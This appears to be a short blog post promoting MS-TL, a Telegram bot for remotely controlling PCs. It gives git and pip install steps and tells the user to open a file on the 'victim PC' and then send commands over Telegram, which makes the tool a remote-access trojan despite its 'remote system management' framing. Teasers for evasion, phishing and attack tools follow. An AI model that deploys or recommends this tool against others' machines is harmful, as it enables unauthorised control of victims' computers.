Cyber security

Meta Sploit Telegram (MS-TL) : Unleashing Remote Control Capabilities Through Telegram

Explore the cutting-edge capabilities of Meta Sploit Telegram (MS-TL), a powerful Telegram bot designed for remote PC control.

This article guides you through the installation process and demonstrates how to effectively commandeer computers via simple Telegram commands.

Unlock the potential of MS-TL and transform your approach to remote system management.

Installing

First, you should install Its_Hub Library .

git clone https://github.com/Unknow-per/MS-TL/

cd MS-TL

pip install -r requirements.txt

python setup.py

How To Use

after complete setup.py:

start MS TL bot in telegram(@msftlbot)

open file in victim PC. and go to telegram.

Now you can send /commands to help.

Standard TK Payloads (10)

builder/tk_payloads/survey.py

For more information click here.

Varshini

Tamil has a great interest in the fields of Cyber Security, OSINT, and CTF projects. Currently, he is deeply involved in researching and publishing various security tools with Kali Linux Tutorials, which is quite fascinating.

Recent Posts

ModTask – Task Scheduler Attack Tool

ModTask is an advanced C# tool designed for red teaming operations, focusing on manipulating scheduled…

22 hours ago

HellBunny : Advanced Shellcode Loader For EDR Evasio

HellBunny is a malleable shellcode loader written in C and Assembly utilizing direct and indirect…

22 hours ago

SharpRedirect : A Lightweight And Efficient .NET-Based TCP Redirector

SharpRedirect is a simple .NET Framework-based redirector from a specified local port to a destination…

22 hours ago

Flyphish : Mastering Cloud-Based Phishing Simulations For Security Assessments

Flyphish is an Ansible playbook allowing cyber security consultants to deploy a phishing server in…

2 days ago

DeLink : Decrypting D-Link Firmware Across Devices With A Rust-Based Library

A crypto library to decrypt various encrypted D-Link firmware images. Confirmed to work on the…

2 days ago

LLM Lies : Hallucinations Are Not Bugs, But Features As Adversarial Examples

LLMs (e.g., GPT-3.5, LLaMA, and PaLM) suffer from hallucination—fabricating non-existent facts to cheat users without…

2 days ago